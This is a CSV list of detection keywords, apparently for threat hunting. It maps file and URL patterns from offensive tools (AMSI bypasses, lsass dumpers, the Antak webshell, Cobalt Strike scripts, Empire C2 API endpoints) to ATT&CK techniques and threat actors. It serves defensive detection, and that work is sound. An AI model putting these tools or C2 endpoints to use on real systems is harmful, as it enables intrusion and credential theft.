+"*/Amsi-Killer.git*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" +"*/AmsiOpenSession.exe*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" +"*/Analyzer-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/AndrewSpecial.git*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*/android/pupydroid/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ANGRYPUPPY.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" +"*/antak.aspx*","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*/anthemtotheego/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" +"*/AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*/AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*/antx-code/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","1","60","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z" +"*/AoratosWin/*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*/APCLdr.*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" +"*/api/admin/shutdown?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/*/kill?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/all/kill?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/all/shell?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/CXPLDTZCKFNT3SLT/shell?*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/stale?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/agents/XMY2H2ZPFWNPGEAP?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/listeners/all?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/modules/collection/*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/modules/credentials*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/agent/initial?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/msg/*?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/reporting/type/checkin?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/stagers/dll?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/stagers?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/api/users/1/disable?token=*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 